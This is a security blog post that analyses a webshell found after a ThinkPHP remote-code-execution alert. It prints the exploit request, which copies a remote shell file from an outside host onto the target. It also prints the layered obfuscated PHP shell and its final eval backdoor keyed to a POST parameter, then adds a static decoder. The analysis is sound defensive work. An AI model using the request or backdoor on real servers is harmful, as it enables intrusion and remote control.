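Analysis of a webshell full of redundant code
While investigating server alerts, I found a ThinkPHP RCE attack attempt, which led to the analysis of a webshell.
Obtaining the webshell
The payload in the alert was: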
GET /index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][]=http://www.520yxsf.com/shell.txt&vars[1][]=libsoft.php HTTP/1.1
Webshell address: http://www.520yxsf.com/shell.txt
Running curl on it returned a phishing warning:
» curl http://www.520yxsf.com/shell.txt
...
<h2>What is phishing?</h2>
<p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.</p>
...
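So of course I clicked "Dismiss this warning and enter site".
Wait, since Cloudflare blocks it, this person's payload is effectively useless... Never mind, let's not worry about these details...
Webshell analysis
The webshell I obtained looks like this: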
<?php define ('lkDwreIpUtyOiuvSVCZTJYLEQNMWPaAshFcoxGbHfBmXdgqKRjnz0209' ,__FILE__ );$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ =urldecode ("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A" );$rlbtQZsXxwWyRTJzUGLdHYhVSDBuAjqnmPeoNiMcIOfagkEvpKFC =$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {3 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {6 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {33 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {30 };$FwgPEKWBluDxXzcaYyvmTZbqSdjsGeLoJrVNQRpUAfHOhtInMiCk =$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {33 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {10 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {24 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {10 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {24 };$OpwGjCKDbakQuJWnEBXAHoMscxPUhZyFiYVeTmrtSIlgfzNdLqRv =$FwgPEKWBluDxXzcaYyvmTZbqSdjsGeLoJrVNQRpUAfHOhtInMiCk {0 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {18 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {3 }.$FwgPEKWBluDxXzcaYyvmTZbqSdjsGeLoJrVNQRpUAfHOhtInMiCk {0 }.$FwgPEKWBluDxXzcaYyvmTZbqSdjsGeLoJrVNQRpUAfHOhtInMiCk {1 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {24 };$XlFyvsPgLIcWEUJkzKhdxZjrumSDMoAntqHpbGOCafVYeNiQTRwB =$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {7 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {13 };$rlbtQZsXxwWyRTJzUGLdHYhVSDBuAjqnmPeoNiMcIOfagkEvpKFC .=$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {22 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {36 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {29 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {26 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {30 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {32 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {35 
}.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {26 }.$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ {30 };eval ($rlbtQZsXxwWyRTJzUGLdHYhVSDBuAjqnmPeoNiMcIOfagkEvpKFC ("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" ));?>
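After tidying up it looks like this (to keep the post from getting too long, I will only include screenshots):
The variable names are random and very long, and there is an eval. Change it to echo and run:
Yet another big pile... Change eval to echo and keep running, but this time it throws an error: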
» php test2.php
Fatal error: Uncaught Error: Function name must be a string in ~/Downloads/test2.php:3
Stack trace:
#0 {main}
  thrown in ~/Downloads/test2.php on line 3
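Looking closely, $FwgPEKWBluDxXzcaYyvmTZbqSdjsGeLoJrVNQRpUAfHOhtInMiCk in the code is defined in the previous layer... Fine, then put the echoed output into the source file in place of the original eval, and run!:
No problem, swap eval for echo and continue:
Again:
Finally reached the last layer... The whole file now looks like this: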
<?php define ('lkDwreIpUtyOiuvSVCZTJYLEQNMWPaAshFcoxGbHfBmXdgqKRjnz0209' , __FILE__ );$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ = urldecode ("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A" );$rlbtQZsXxwWyRTJzUGLdHYhVSDBuAjqnmPeoNiMcIOfagkEvpKFC = $hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ [3 ] . $hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ [6 ] . $hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ [33 ] . $hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ [30 ];$FwgPEKWBluDxXzcaYyvmTZbqSdjsGeLoJrVNQRpUAfHOhtInMiCk = $hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ [33 ] . $hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ [10 ] . $hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ [24 ] . $hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ [10 ] . $hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ [24 ];$OpwGjCKDbakQuJWnEBXAHoMscxPUhZyFiYVeTmrtSIlgfzNdLqRv = $FwgPEKWBluDxXzcaYyvmTZbqSdjsGeLoJrVNQRpUAfHOhtInMiCk [0 ] . $hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ [18 ] . $hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ [3 ] . $FwgPEKWBluDxXzcaYyvmTZbqSdjsGeLoJrVNQRpUAfHOhtInMiCk [0 ] . $FwgPEKWBluDxXzcaYyvmTZbqSdjsGeLoJrVNQRpUAfHOhtInMiCk [1 ] . $hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ [24 ];$XlFyvsPgLIcWEUJkzKhdxZjrumSDMoAntqHpbGOCafVYeNiQTRwB = $hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ [7 ] . $hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ [13 ];$rlbtQZsXxwWyRTJzUGLdHYhVSDBuAjqnmPeoNiMcIOfagkEvpKFC .= $hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ [22 ] . $hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ [36 ] . $hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ [29 ] . $hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ [26 ] . $hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ [30 ] . $hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ [32 ] . 
$hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ [35 ] . $hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ [26 ] . $hJrlsZBnfGeqkRIVPbpNALSCEjaODYXHwTKudgivMUtomcyzxFWQ [30 ];$yrNsBmYQPwqoDRzVIcHudeiOpvMXabLSFKAGUhftgEJkZnTjlCWx ="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" ;?> <?php define ('MoqfyESzbQIGFgpJOlvHLdukDtKiTwXYBZUNrajnsxcChWRAPVme0209' , lkDwreIpUtyOiuvSVCZTJYLEQNMWPaAshFcoxGbHfBmXdgqKRjnz0209);$pKCoIVzdUvMJmZNGQFByDTLkhtbSjHxisOYanerfXEcRlWwuqAgP = urldecode ("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A" );$KklmGOierAFfHPMaqNpSuWhUBbZCnzQjXscVRTygJIYEoxdvLDtw = $pKCoIVzdUvMJmZNGQFByDTLkhtbSjHxisOYanerfXEcRlWwuqAgP [3 ] . $pKCoIVzdUvMJmZNGQFByDTLkhtbSjHxisOYanerfXEcRlWwuqAgP [6 ] . $pKCoIVzdUvMJmZNGQFByDTLkhtbSjHxisOYanerfXEcRlWwuqAgP [33 ] . $pKCoIVzdUvMJmZNGQFByDTLkhtbSjHxisOYanerfXEcRlWwuqAgP [30 ];$lUZzerPGtxyVRgLQYFaJcoNBjhTAIECiSkOHsdKXqfDnwpmvbWMu = $pKCoIVzdUvMJmZNGQFByDTLkhtbSjHxisOYanerfXEcRlWwuqAgP [33 ] . $pKCoIVzdUvMJmZNGQFByDTLkhtbSjHxisOYanerfXEcRlWwuqAgP [10 ] . $pKCoIVzdUvMJmZNGQFByDTLkhtbSjHxisOYanerfXEcRlWwuqAgP [24 ] . $pKCoIVzdUvMJmZNGQFByDTLkhtbSjHxisOYanerfXEcRlWwuqAgP [10 ] . $pKCoIVzdUvMJmZNGQFByDTLkhtbSjHxisOYanerfXEcRlWwuqAgP [24 ];$hfLUoyvpTNYQgPmqJjurlabSGnsFetxkwDVCAicWZKIdEMzORHXB = $lUZzerPGtxyVRgLQYFaJcoNBjhTAIECiSkOHsdKXqfDnwpmvbWMu [0 ] . $pKCoIVzdUvMJmZNGQFByDTLkhtbSjHxisOYanerfXEcRlWwuqAgP [18 ] . $pKCoIVzdUvMJmZNGQFByDTLkhtbSjHxisOYanerfXEcRlWwuqAgP [3 ] . $lUZzerPGtxyVRgLQYFaJcoNBjhTAIECiSkOHsdKXqfDnwpmvbWMu [0 ] . $lUZzerPGtxyVRgLQYFaJcoNBjhTAIECiSkOHsdKXqfDnwpmvbWMu [1 ] . $pKCoIVzdUvMJmZNGQFByDTLkhtbSjHxisOYanerfXEcRlWwuqAgP [24 ];$BxEtdzAILpbWjVCisZneouhfPkUvXrFMQwOlHgJKSGyNaDqmcTYR = $pKCoIVzdUvMJmZNGQFByDTLkhtbSjHxisOYanerfXEcRlWwuqAgP [7 ] . $pKCoIVzdUvMJmZNGQFByDTLkhtbSjHxisOYanerfXEcRlWwuqAgP [13 ];$KklmGOierAFfHPMaqNpSuWhUBbZCnzQjXscVRTygJIYEoxdvLDtw .= $pKCoIVzdUvMJmZNGQFByDTLkhtbSjHxisOYanerfXEcRlWwuqAgP [22 ] . 
$pKCoIVzdUvMJmZNGQFByDTLkhtbSjHxisOYanerfXEcRlWwuqAgP [36 ] . $pKCoIVzdUvMJmZNGQFByDTLkhtbSjHxisOYanerfXEcRlWwuqAgP [29 ] . $pKCoIVzdUvMJmZNGQFByDTLkhtbSjHxisOYanerfXEcRlWwuqAgP [26 ] . $pKCoIVzdUvMJmZNGQFByDTLkhtbSjHxisOYanerfXEcRlWwuqAgP [30 ] . $pKCoIVzdUvMJmZNGQFByDTLkhtbSjHxisOYanerfXEcRlWwuqAgP [32 ] . $pKCoIVzdUvMJmZNGQFByDTLkhtbSjHxisOYanerfXEcRlWwuqAgP [35 ] . $pKCoIVzdUvMJmZNGQFByDTLkhtbSjHxisOYanerfXEcRlWwuqAgP [26 ] . $pKCoIVzdUvMJmZNGQFByDTLkhtbSjHxisOYanerfXEcRlWwuqAgP [30 ];$sfVNmkDitJqygevUHXoTwnPujbOSZxRrchAzQBLaYGFpKICWlEdM = "lCkBxyqmQWAaziVrvYPMnhEbNJFZotHIdfcSOKgGDjUwTLsueRpXFmvxEgKpMwCBbhDOWGanrkfVAUYQuqePZoJNzdiTLsRSjlItycHXaL9SBeCiab4=" ;?> <?php ?> <?php define ('uoCLQnySpGOesqNTvPZmEFbhlxcRIgAjVkYJfWzirXwtUBaMHKdD0209' , lkDwreIpUtyOiuvSVCZTJYLEQNMWPaAshFcoxGbHfBmXdgqKRjnz0209);$CLMfEliasjTAOPnhJQqUgKuVGDwSyoFHeRxbcWkXpvmZYtzrBdIN = urldecode ("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A" );$SEMyzkgYPvufheRQHBlTqjDLnwNOGJAIcoWxbZCdVaKXUsrtFmpi = $CLMfEliasjTAOPnhJQqUgKuVGDwSyoFHeRxbcWkXpvmZYtzrBdIN [3 ] . $CLMfEliasjTAOPnhJQqUgKuVGDwSyoFHeRxbcWkXpvmZYtzrBdIN [6 ] . $CLMfEliasjTAOPnhJQqUgKuVGDwSyoFHeRxbcWkXpvmZYtzrBdIN [33 ] . $CLMfEliasjTAOPnhJQqUgKuVGDwSyoFHeRxbcWkXpvmZYtzrBdIN [30 ];$vozMeQHSLuPIjXJmkFOnURKGiCaZDWNdBcyErglsqbfYtTxhwAVp = $CLMfEliasjTAOPnhJQqUgKuVGDwSyoFHeRxbcWkXpvmZYtzrBdIN [33 ] . $CLMfEliasjTAOPnhJQqUgKuVGDwSyoFHeRxbcWkXpvmZYtzrBdIN [10 ] . $CLMfEliasjTAOPnhJQqUgKuVGDwSyoFHeRxbcWkXpvmZYtzrBdIN [24 ] . $CLMfEliasjTAOPnhJQqUgKuVGDwSyoFHeRxbcWkXpvmZYtzrBdIN [10 ] . $CLMfEliasjTAOPnhJQqUgKuVGDwSyoFHeRxbcWkXpvmZYtzrBdIN [24 ];$qPxVFpDGfRJcZdlLBovUMwWhiIaeAQjNSKsYymzOrbCXutHTEkng = $vozMeQHSLuPIjXJmkFOnURKGiCaZDWNdBcyErglsqbfYtTxhwAVp [0 ] . $CLMfEliasjTAOPnhJQqUgKuVGDwSyoFHeRxbcWkXpvmZYtzrBdIN [18 ] . $CLMfEliasjTAOPnhJQqUgKuVGDwSyoFHeRxbcWkXpvmZYtzrBdIN [3 ] . $vozMeQHSLuPIjXJmkFOnURKGiCaZDWNdBcyErglsqbfYtTxhwAVp [0 ] . 
$vozMeQHSLuPIjXJmkFOnURKGiCaZDWNdBcyErglsqbfYtTxhwAVp [1 ] . $CLMfEliasjTAOPnhJQqUgKuVGDwSyoFHeRxbcWkXpvmZYtzrBdIN [24 ];$cJXIhmuKbBEwxCRPsOraiopQjyvDqVtgYFGTNlMLdkHWenfZzSAU = $CLMfEliasjTAOPnhJQqUgKuVGDwSyoFHeRxbcWkXpvmZYtzrBdIN [7 ] . $CLMfEliasjTAOPnhJQqUgKuVGDwSyoFHeRxbcWkXpvmZYtzrBdIN [13 ];$SEMyzkgYPvufheRQHBlTqjDLnwNOGJAIcoWxbZCdVaKXUsrtFmpi .= $CLMfEliasjTAOPnhJQqUgKuVGDwSyoFHeRxbcWkXpvmZYtzrBdIN [22 ] . $CLMfEliasjTAOPnhJQqUgKuVGDwSyoFHeRxbcWkXpvmZYtzrBdIN [36 ] . $CLMfEliasjTAOPnhJQqUgKuVGDwSyoFHeRxbcWkXpvmZYtzrBdIN [29 ] . $CLMfEliasjTAOPnhJQqUgKuVGDwSyoFHeRxbcWkXpvmZYtzrBdIN [26 ] . $CLMfEliasjTAOPnhJQqUgKuVGDwSyoFHeRxbcWkXpvmZYtzrBdIN [30 ] . $CLMfEliasjTAOPnhJQqUgKuVGDwSyoFHeRxbcWkXpvmZYtzrBdIN [32 ] . $CLMfEliasjTAOPnhJQqUgKuVGDwSyoFHeRxbcWkXpvmZYtzrBdIN [35 ] . $CLMfEliasjTAOPnhJQqUgKuVGDwSyoFHeRxbcWkXpvmZYtzrBdIN [26 ] . $CLMfEliasjTAOPnhJQqUgKuVGDwSyoFHeRxbcWkXpvmZYtzrBdIN [30 ];$DMxquRQyJeosinKFbvlTrjmgXcwtpkHPOGzdZAhSEVaILCfNBYWU = "idsoLMvEgDNkAjIXPVpqTSFbtzWRxuJBeHOCrZYmQclGKwayUhnfgJSyWKekjItNXarMiUQmsubCBdfRPHFclAvpEzTDOxqhLoZwYVnGiI9oZAXjznUHT3RQC24jJhUdJpjNTuq7ZfTjLhUBxAR5LpRVLuq7Fhk9rDUaZh8jFwTaKdj0tsX7FgKwvIx3vsSDrdrwtajPvwTaKaYdKsj7FgKwtskdKISnvwr7rA1XzMzVCpjNTuN7GYc0zMt0LpRGYk9sUbSnZAVPvsNPKak3F10Qvd8+" ;?> <?php function test ($a ) { if (empty ($a )) { $a = "echo '防火墙拦截';" ; } @eval ($a ); } @test ($_POST ['hxq991217' ]);?>
Only this part is useful:
<?php
function test($a)
{
    if (empty($a)) {
        $a = "echo '防火墙拦截;';";
    }
    @eval($a);
}
@test($_POST['hxq991217']);
?>
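People really will write anything to get past a WAF (shrug)
Finally, a social-engineering style lookup of hxq991217 turns up some information, though whether it really is this person is unknown.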
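The eval-to-echo peeling above runs the sample's code at every step; the same layers can be decoded statically instead. The following Python is an added example, not part of the original post: it resolves the lookup-table variables to the names they spell and decodes the short blob from the unpacked file. The layer layout (first 52 characters are the target alphabet, the next 52 the source alphabet, the remainder substituted base64) is an assumption inferred from those recovered names, and all function and variable names are hypothetical.

```python
import base64
from urllib.parse import unquote

# Lookup table copied from the sample's urldecode() call.
TABLE = unquote(
    "%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B"
    "%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A"
)

def pick(indices, source=TABLE):
    """Rebuild a string the way the sample does: source[i] . source[j] ..."""
    return "".join(source[i] for i in indices)

def recover_names():
    """Resolve the four obfuscated variables to the values they hold."""
    strtr = pick([33, 10, 24, 10, 24])
    return {
        "decoder": pick([3, 6, 33, 30])
        + pick([22, 36, 29, 26, 30, 32, 35, 26, 30]),
        "translate": strtr,
        "slice": strtr[0] + pick([18, 3]) + strtr[0] + strtr[1] + pick([24]),
        "width": pick([7, 13]),
    }

def unpack_layer(blob, width=52):
    """Decode one layer without executing it.

    Assumed layout (inferred, not stated on the page): blob[:width] is the
    target alphabet, blob[width:2*width] the source alphabet, and the rest
    is base64 text whose characters were substituted.
    """
    to_chars = blob[:width]
    from_chars = blob[width:2 * width]
    body = blob[2 * width:]
    plain_b64 = body.translate(str.maketrans(from_chars, to_chars))
    return base64.b64decode(plain_b64).decode("utf-8", errors="replace")

# Short blob copied from the unpacked file shown above.
SHORT_BLOB = (
    "lCkBxyqmQWAaziVrvYPMnhEbNJFZotHIdfcSOKgGDjUwTLsueRpX"
    "FmvxEgKpMwCBbhDOWGanrkfVAUYQuqePZoJNzdiTLsRSjlItycHX"
    "aL9SBeCiab4="
)

if __name__ == "__main__":
    print(recover_names())
    print(repr(unpack_layer(SHORT_BLOB)))
```

The short blob decodes to an empty PHP block, which matches the `<?php ?>` that appears after it in the unpacked file.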
- By:tr0y.wang